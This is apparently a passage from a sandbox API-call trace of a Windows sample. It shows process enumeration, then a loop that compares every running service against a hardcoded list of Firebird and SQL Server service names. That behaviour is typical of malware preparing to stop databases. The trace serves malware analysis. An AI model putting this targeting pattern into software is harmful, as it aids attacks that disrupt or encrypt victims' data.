hSnapshot=0x348, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0286.447] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0286.447] Process32NextW (in: hSnapshot=0x348, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="mobsync.exe")) returned 1 [0286.448] lstrlenW (lpString="mobsync.exe") returned 11 [0286.448] Process32NextW (in: hSnapshot=0x348, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0xa24, pcPriClassBase=8, dwFlags=0x0, szExeFile="wdgmug.exe")) returned 1 [0286.449] lstrlenW (lpString="wdgmug.exe") returned 10 [0286.449] Process32NextW (in: hSnapshot=0x348, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xdd0, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0286.449] lstrlenW (lpString="cmd.exe") returned 7 [0286.450] Process32NextW (in: hSnapshot=0x348, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xddc, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0286.450] lstrlenW (lpString="conhost.exe") returned 11 [0286.450] Process32NextW (in: hSnapshot=0x348, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xddc, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0286.451] CloseHandle (hObject=0x348) returned 1 [0286.451] Sleep (dwMilliseconds=0x1f4) [0287.488] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x4013a48 [0287.513] EnumServicesStatusExW (in: hSCManager=0x4013a48, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0) returned 0 [0287.514] GetLastError () returned 0xea [0287.514] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1bc4) returned 0x560fa8 [0287.514] EnumServicesStatusExW (in: hSCManager=0x4013a48, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x560fa8, cbBufSize=0x1bc4, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x560fa8, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0) returned 1 [0287.516] CloseServiceHandle (hSCObject=0x4013a48) returned 1 [0287.516] lstrlenW (lpString="AppXSvc") returned 7 [0287.516] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0287.516] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0287.516] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0287.516] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0287.516] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0287.516] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0287.516] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0287.516] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0287.516] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0287.516] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0287.516] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0287.516] lstrlenW (lpString="Audiosrv") returned 8 [0287.516] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0287.516] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0287.516] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0287.516] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0287.516] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0287.516] lstrlenW (lpString="BFE") returned 3 [0287.516] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0287.517] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0287.517] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0287.517] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0287.517] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0287.517] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0287.517] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0287.517] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0287.517] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0287.517] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0287.517] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0287.517] lstrlenW (lpString="CDPSvc") returned 6 [0287.517] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0287.517] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0287.517] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0287.517] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0287.517] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0287.517] lstrlenW (lpString="ClickToRunSvc") returned 13 [0287.517] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0287.517] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0287.517] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0287.517] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0287.517] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0287.517] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0287.517] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0287.517] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0287.517] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0287.517] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0287.518] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0287.518] lstrlenW (lpString="CryptSvc") returned 8 [0287.518] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0287.518] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0287.518] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0287.518] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0287.518] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0287.518] lstrlenW (lpString="DcomLaunch") returned 10 [0287.518] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0287.518] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0287.518] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0287.518] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0287.518] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0287.518] lstrlenW (lpString="DeviceAssociationService") returned 24 [0287.518] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0287.518] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0287.518] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0287.518] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0287.518] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0287.518] lstrlenW (lpString="Dhcp") returned 4 [0287.518] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0287.518] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0287.518] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0287.518] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0287.518] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0287.518] lstrlenW (lpString="Dnscache") returned 8 [0287.519] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0287.519] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0287.519] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0287.519] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0287.519] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0287.519] lstrlenW (lpString="DPS") returned 3 [0287.519] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0287.519] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0287.519] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0287.519] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0287.519] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0287.519] lstrlenW (lpString="DusmSvc") returned 7 [0287.519] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0287.519] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0287.519] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0287.519] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0287.519] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0287.519] lstrlenW (lpString="EventLog") returned 8 [0287.519] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0287.519] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0287.519] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0287.519] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0287.519] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0287.519] lstrlenW (lpString="EventSystem") returned 11 [0287.519] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0287.519] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0287.519] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0287.519] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0287.519] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0287.519] lstrlenW (lpString="FontCache") returned 9 [0287.519] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0287.520] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0287.520] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0287.520] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0287.520] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0287.520] lstrlenW (lpString="gpsvc") returned 5 [0287.520] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0287.520] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0287.520] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0287.520] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0287.520] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0287.520] lstrlenW (lpString="iphlpsvc") returned 8 [0287.520] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0287.520] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0287.520] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0287.520] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0287.520] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0287.520] lstrlenW (lpString="KeyIso") returned 6 [0287.520] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0287.520] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0287.520] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0287.520] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0287.520] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0287.520] lstrlenW (lpString="LanmanServer") returned 12 [0287.520] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0287.520] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0287.520] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0287.520] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0287.520] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0287.520] lstrlenW (lpString="LanmanWorkstation") returned 17 [0287.520] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0287.520] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0287.521] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0287.521] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0287.521] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0287.521] lstrlenW (lpString="lfsvc") returned 5 [0287.521] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0287.521] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0287.521] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0287.521] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0287.521] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0287.521] lstrlenW (lpString="lmhosts") returned 7 [0287.521] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0287.521] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0287.521] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0287.521] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0287.521] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0287.521] lstrlenW (lpString="LSM") returned 3 [0287.521] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0287.521] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0287.521] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0287.521] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0287.521] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0287.521] lstrlenW (lpString="MpsSvc") returned 6 [0287.521] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0287.521] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0287.521] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0287.521] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0287.521] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0287.521] lstrlenW (lpString="NcbService") returned 10 [0287.521] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0287.521] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0287.521] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0287.521] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0287.521] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0287.521] lstrlenW (lpString="netprofm") returned 8 [0287.522] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0287.522] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0287.522] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0287.522] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0287.522] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0287.625] lstrlenW (lpString="NgcSvc") returned 6 [0287.625] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NgcSvc") returned -1 [0287.625] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NgcSvc") returned -1 [0287.625] lstrcmpiW (lpString1="sqlwriter", lpString2="NgcSvc") returned 1 [0287.625] lstrcmpiW (lpString1="mssqlserver", lpString2="NgcSvc") returned -1 [0287.625] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NgcSvc") returned 1 [0287.625] lstrlenW (lpString="NlaSvc") returned 6 [0287.625] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0287.625] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0287.625] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0287.625] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0287.625] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0287.625] lstrlenW (lpString="nsi") returned 3 [0287.625] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0287.625] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0287.625] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0287.625] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0287.625] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0287.625] lstrlenW (lpString="PcaSvc") returned 6 [0287.625] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0287.625] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0287.625] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0287.625] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0287.626] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0287.626] lstrlenW (lpString="PlugPlay") returned 8 [0287.626] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0287.626] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0287.626] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0287.626] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0287.626] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0287.626] lstrlenW (lpString="Power") returned 5 [0287.626] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0287.626] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0287.626] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0287.626] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0287.626] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0287.626] lstrlenW (lpString="ProfSvc") returned 7 [0287.626] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0287.626] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0287.626] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0287.626] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0287.626] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0287.626] lstrlenW (lpString="RpcEptMapper") returned 12 [0287.626] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0287.626] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0287.627] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0287.627] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0287.627] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0287.627] lstrlenW (lpString="RpcSs") returned 5 [0287.627] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0287.627] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0287.627] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0287.627] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0287.627] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0287.627] lstrlenW (lpString="SamSs") returned 5 [0287.627] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0287.627] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0287.627] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0287.627] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0287.627] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0287.627] lstrlenW (lpString="Schedule") returned 8 [0287.627] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0287.627] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0287.627] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0287.627] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0287.628] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0287.628] lstrlenW (lpString="SecurityHealthService") returned 21 [0287.628] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0287.628] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0287.628] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0287.628] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0287.628] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0287.628] lstrlenW (lpString="SENS") returned 4 [0287.628] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0287.628] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0287.628] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0287.628] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0287.628] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0287.628] lstrlenW (lpString="ShellHWDetection") returned 16 [0287.628] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0287.628] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0287.628] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0287.628] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0287.628] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0287.628] lstrlenW (lpString="Spooler") returned 7 [0287.628] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0287.628] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0287.629] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0287.629] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0287.629] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0287.629] lstrlenW (lpString="StateRepository") returned 15 [0287.629] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0287.629] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0287.629] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0287.629] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0287.629] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0287.629] lstrlenW (lpString="SysMain") returned 7 [0287.629] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0287.629] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0287.629] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0287.629] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0287.629] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0287.629] lstrlenW (lpString="SystemEventsBroker") returned 18 [0287.629] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0287.629] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0287.629] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0287.629] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0287.629] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SystemEventsBroker") returned -1 [0287.630] lstrlenW (lpString="Themes") returned 6 [0287.630] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0287.630] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0287.630] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0287.630] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0287.630] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0287.630] lstrlenW (lpString="tiledatamodelsvc") returned 16 [0287.630] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0287.630] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0287.630] lstrcmpiW (lpString1="sqlwriter", lpString2="tiledatamodelsvc") returned -1 [0287.630] lstrcmpiW (lpString1="mssqlserver", lpString2="tiledatamodelsvc") returned 